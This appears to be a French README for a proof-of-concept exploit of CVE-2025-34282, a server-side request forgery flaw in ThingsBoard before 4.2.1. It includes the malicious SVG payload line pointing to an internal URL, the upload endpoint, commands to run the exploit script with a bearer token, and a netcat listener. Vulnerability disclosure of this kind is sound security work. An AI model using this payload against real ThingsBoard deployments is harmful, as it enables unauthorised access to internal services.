
Exploit PoC pour CVE-2025-34282 - SSRF ThingsBoard via envoi d'image SVG
Vulnérabilité de type Server-Side Request Forgery (SSRF) dans la plateforme IoT ThingsBoard, versions antérieures à 4.2.1.
Un attaquant disposant d'un accès Tenant Admin peut téléverser un fichier SVG malveillant contenant une référence d'URL interne via la galerie de téléversement d'images. Lorsque ThingsBoard traite le SVG côté serveur, il récupère l'URL référencée — permettant ainsi l'accès à des services internes non exposés à Internet.
| Champ | Détails |
|---|---|
| CVE | CVE-2025-34282 |
| Version affectée | < 4.2.1 |
| Version corrigée | 4.2.1 |
| Score CVSS | 6.9 Moyen |
| CWE | CWE-918 (Server-Side Request Forgery) |
| Éditeur | https://thingsboard.io |
POST /api/image
publicLink du SVG via une balise <object>
La charge utile ssrf_localhost_5555.svg intègre une référence d'URL interne :
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />
Une fois téléversé, le serveur de ThingsBoard récupère http://127.0.0.1:5555, confirmant ainsi la SSRF.
Prérequis :
pip install requests
Exécution :
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>
Exemple :
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...
Démarrez un écouteur pour capturer le rappel SSRF avant d'exécuter l'exploit :
nc -l 5555
Tamil Mathi T.